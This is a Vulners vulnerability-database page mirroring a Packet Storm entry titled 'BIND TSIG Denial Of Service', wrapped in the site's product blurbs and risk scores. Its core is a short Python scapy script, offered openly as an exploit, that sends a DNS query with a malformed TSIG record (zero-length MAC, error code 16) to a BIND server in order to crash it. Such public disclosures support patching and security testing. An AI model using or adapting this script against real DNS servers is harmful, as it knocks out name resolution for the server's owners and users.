Lucene search
K

BIND TSIG Denial Of Service

🗓️ 27 May 2020 00:00:00Reported by Teppei FukudaType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 1503 Views

Python script to exploit BIND TSIG Denial of Service vulnerability

Related
Code
`#!/usr/bin/python  
#coding:utf-8  
  
from scapy.all import DNS, DNSQR, IP, sr1, UDP, DNSRRTSIG, DNSRROPT  
  
tsig = DNSRRTSIG(rrname="local-ddns", algo_name="hmac-sha256", rclass=255, mac_len=0, mac_data="", time_signed=0, fudge=300, error=16)  
  
dns_req = IP(dst='127.0.0.1')/UDP(dport=53)/DNS(rd=1, ad=1, qd=DNSQR(qname='www.example.com'), ar=tsig)  
answer = sr1(dns_req, verbose=0)  
  
print(answer[DNS].summary())  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

27 May 2020 00:00Current
1.3Low risk
Vulners AI Score1.3
EPSS0.93422
1503